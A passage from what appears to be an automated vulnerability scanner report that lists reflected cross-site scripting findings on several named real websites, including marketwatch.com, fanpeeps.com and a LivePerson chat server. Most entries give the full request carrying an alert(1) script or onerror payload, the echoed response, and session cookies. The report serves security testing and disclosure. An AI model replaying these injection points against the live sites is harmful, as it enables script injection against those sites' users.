Host: sbklivequoteserverdl.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/?zone=intromessage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=65a08c08-94ef-4153-a49e-58cc26e0596f; smintromsg1=true; smintromsg1e=true; __utmz=205638161.1305368018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205638161.1117820965.1305368018.1305368018.1305368018.1; __utmc=205638161; __utmb=205638161.1.10.1305368018; s_vnum=1307960020151%26vn%3D1; s_dbfe=1305368020152; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:19:09 GMT
Content-Length: 226

jQuery15106331928954459727_13053680199773ecce<a>4f9c5407d3e({"token" : "1037D381681A41D3B5CEEB943EC58008", "data" : "340.5|-6.07,11.93|-0.27,16.88|-0.05,15.08|-0.18,19.89|-0.25,12595.75|-100.17,2828.47|-34.57,1337.77|-10.88"})

4.81. http://server.iad.liveperson.net/hc/44533531/ [lpCallId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/44533531/

Issue detail

The value of the lpCallId request parameter is copied into the HTML document as plain text between tags. The payload 5fd52<img%20src%3da%20onerror%3dalert(1)>da307982a87 was submitted in the lpCallId parameter. This input was echoed as 5fd52<img src=a onerror=alert(1)>da307982a87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/44533531/?lpCallId=1305377526944-2655fd52<img%20src%3da%20onerror%3dalert(1)>da307982a87&lpjson=2&site=44533531&sessionkey=H7032450980834070235-4139296687908663322K2753111&cmd=visitorPoll HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://server.iad.liveperson.net/hc/44533531/?cmd=file&file=preChatSurveyContent&site=44533531&sessionkey=H7032450980834070235-4139296687908663322K2753111&survey=Pre-Chat
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7032450980834070235; LivePersonID=-16101514677756-1305377522:-1:-1:-1:-1; HumanClickCHATKEY=4139296687908663322; HumanClickSiteContainerID_44533531=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1305377524917

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:52:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_44533531=STANDALONE; path=/hc/44533531
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 14 May 2011 12:52:56 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 142

lpConnLib.Process({"ResultSet": {"lpCallId":"1305377526944-2655fd52<img src=a onerror=alert(1)>da307982a87","lpCallConfirm":"","lpData":[]}});

4.82. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js [_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartmoney.onespot.com
Path:   /ism/nextclick_wsjdn/index.js

Issue detail

The value of the _ request parameter is copied into the HTML document as plain text between tags. The payload 451fe<script>alert(1)</script>4278ff0e76f was submitted in the _ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/nextclick_wsjdn/index.js?url=http%3A%2F%2Fwww.smartmoney.com%2Finvest%2Fstrategies%2Fheavy-metal-debate-silver-vs-gold-1305310258887%2F&have_content=true&callback=onespot.dispatch&_=1305368029696451fe<script>alert(1)</script>4278ff0e76f HTTP/1.1
Host: smartmoney.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Sat, 14 May 2011 10:21:51 GMT
ETag: "7588b5ee53624bb9c397ea850716e6c9"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 46
X-Varnish: 1066829701
Connection: keep-alive
Content-Length: 5702

onespot.dispatch451fe<script>alert(1)</script>4278ff0e76f({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n <title>OneSpot NextClick
...[SNIP]...

4.83. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartmoney.onespot.com
Path:   /ism/nextclick_wsjdn/index.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 90d1d<script>alert(1)</script>7e5368fbed8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/nextclick_wsjdn/index.js?url=http%3A%2F%2Fwww.smartmoney.com%2Finvest%2Fstrategies%2Fheavy-metal-debate-silver-vs-gold-1305310258887%2F&have_content=true&callback=onespot.dispatch90d1d<script>alert(1)</script>7e5368fbed8&_=1305368029696 HTTP/1.1
Host: smartmoney.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Sat, 14 May 2011 10:21:25 GMT
ETag: "1c81e0cbf5462968bab2ac2a8df6bfed"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 79
X-Varnish: 1066829210
Connection: keep-alive
Content-Length: 5702

onespot.dispatch90d1d<script>alert(1)</script>7e5368fbed8({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n <title>OneSpot NextClick
...[SNIP]...

4.84. http://topics.wsj.com/api-video/get_video_info.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://topics.wsj.com
Path:   /api-video/get_video_info.asp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21cdf"%3b6c5435b28da was submitted in the REST URL parameter 2. This input was echoed as 21cdf";6c5435b28da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api-video/get_video_info.asp21cdf"%3b6c5435b28da?guid={7A591B4C-215B-4895-A64A-C793AEEBB8A6}&fields=thumbnailURLSmall&cb=1534993 HTTP/1.1
Host: topics.wsj.com
Proxy-Connection: keep-alive
Referer: http://topics.wsj.com/subject/W/wall-street-journal/nbc-news-polls/6052
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; wsjregion=na%2cus; s_vnum=1307959748765%26vn%3D1; s_dbfe=1305367748766; DJSESSION=ORCS%3Dna%2Cus%7C%7CBIZO%3Dbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2233%22%2C%22high%22%3A%5B%2270%22%5D%2C%22low%22%3A%5B%2256%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DSat%2C%2014%20May%202011%2010%3A29%3A14%20GMT%7C%7CweatherCode%3D10005; rsi_csl=; rsi_segs=; mbox=check#true#1305367858|session#1305367797515-52119#1305369658; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 10:13:24 GMT
Server: Microsoft-IIS/6.0
X-Machine: SBK-MW04
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 43358
Content-Type: text/html
Expires: Fri, 13 May 2011 10:12:24 GMT
Cache-control: False

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- Generated on SBK-MW04 -->
<HTML><HEAD><meta name="description" content="M
...[SNIP]...
tifying name, server, and channel on the next lines. */
s.hier1="MarketWatch,Not Found,Other,Error Page,http://www.marketwatch.com/404.asp404;http://www.marketwatch.com:80/api-video/get_video_info.asp21cdf";6c5435b28da?guid={7a591b4c-215b-4895-a64a-c793aeebb8a6}&fields=thumbnailurlsmall&cb=1534993"
s.pageName="Error Page"
s.server="www.marketwatch.com"
s.channel="MarketWatch"
s.prop1="Not Found"
s.prop2="Other"
...[SNIP]...

4.85. http://www.fanpeeps.com/ [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8f352><script>alert(1)</script>78a6f46f052 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=tweets8f352><script>alert(1)</script>78a6f46f052&pid=14&iid=4 HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?pid=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.6.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 101534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=action value=tweets8f352><script>alert(1)</script>78a6f46f052>
...[SNIP]...

4.86. http://www.fanpeeps.com/ [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c860b'><script>alert(1)</script>29abf483c43 was submitted in the action parameter. This input was echoed as c860b\'><script>alert(1)</script>29abf483c43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=tweetsc860b'><script>alert(1)</script>29abf483c43&pid=14&iid=4 HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?pid=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.6.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 101540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=action value='tweetsc860b\'><script>alert(1)</script>29abf483c43'>
...[SNIP]...

4.87. http://www.fanpeeps.com/ [iid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the iid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload eb66e><script>alert(1)</script>fc611338e18 was submitted in the iid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?iid=2eb66e><script>alert(1)</script>fc611338e18&pid=14 HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?action=tweets&pid=14&iid=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.7.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 62410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=idol value=2eb66e><script>alert(1)</script>fc611338e18>
...[SNIP]...

4.88. http://www.fanpeeps.com/ [iid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the iid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b419"><script>alert(1)</script>ab1641f8df6 was submitted in the iid parameter. This input was echoed as 9b419\"><script>alert(1)</script>ab1641f8df6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?iid=29b419"><script>alert(1)</script>ab1641f8df6&pid=14 HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?action=tweets&pid=14&iid=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.7.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 62423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<a href="/?pid=14&idol=29b419\"><script>alert(1)</script>ab1641f8df6&action=tweets">
...[SNIP]...

4.89. http://www.fanpeeps.com/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cbf3"><script>alert(1)</script>4806a366db was submitted in the pid parameter. This input was echoed as 4cbf3\"><script>alert(1)</script>4806a366db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=144cbf3"><script>alert(1)</script>4806a366db HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.5.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 18110

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a href="?pid=144cbf3\"><script>alert(1)</script>4806a366db">
...[SNIP]...

4.90. http://www.fanpeeps.com/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2d1d7><script>alert(1)</script>f3294fbacbe was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=142d1d7><script>alert(1)</script>f3294fbacbe HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.5.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 18095

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a rel=nofollow href=/?action=home&pid=-1&zpid=142d1d7><script>alert(1)</script>f3294fbacbe>
...[SNIP]...

4.91. http://www.marketwatch.com/Dockingbar/Dock/_AlertItem [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /Dockingbar/Dock/_AlertItem

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c56d'%3b41cfb76de42 was submitted in the REST URL parameter 2. This input was echoed as 6c56d';41cfb76de42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Dockingbar/Dock6c56d'%3b41cfb76de42/_AlertItem HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Sat, 14 May 2011 11:03:13 GMT
Content-Length: 50903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/Dockingbar/Dock6c56d';41cfb76de42/_AlertItem';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.92. http://www.marketwatch.com/Dockingbar/Dock/_AlertItem [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /Dockingbar/Dock/_AlertItem

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 314bf'%3bb227a982ee5 was submitted in the REST URL parameter 3. This input was echoed as 314bf';b227a982ee5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Dockingbar/Dock/_AlertItem314bf'%3bb227a982ee5 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp02
Date: Sat, 14 May 2011 11:03:48 GMT
Content-Length: 50968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/Dockingbar/Dock/_AlertItem314bf';b227a982ee5';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.93. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /bg/api/Connect.ashx

Issue detail

